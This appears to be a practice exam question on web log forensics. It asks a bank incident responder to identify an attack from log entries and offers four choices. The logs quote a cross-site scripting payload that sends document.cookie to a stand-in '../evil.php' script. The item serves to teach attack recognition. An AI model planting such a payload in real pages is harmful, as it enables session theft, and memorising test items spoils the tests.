QuestionQ41
Logs and Network ForensicsYou are the incident response manager at a regional bank. During a routine audit of web application logs, you identify several attempted login submissions containing these strings:
< SCRIPT type="text/javascript" >
var adr = '../evil.php?cakemonster=' + escape(document.cookie);
< /SCRIPT >
What type of attack has occurred?
- A Cross-site scripting
- B Cross-site request forgery
- C Buffer overflow
- D SQL injection
Community Discussion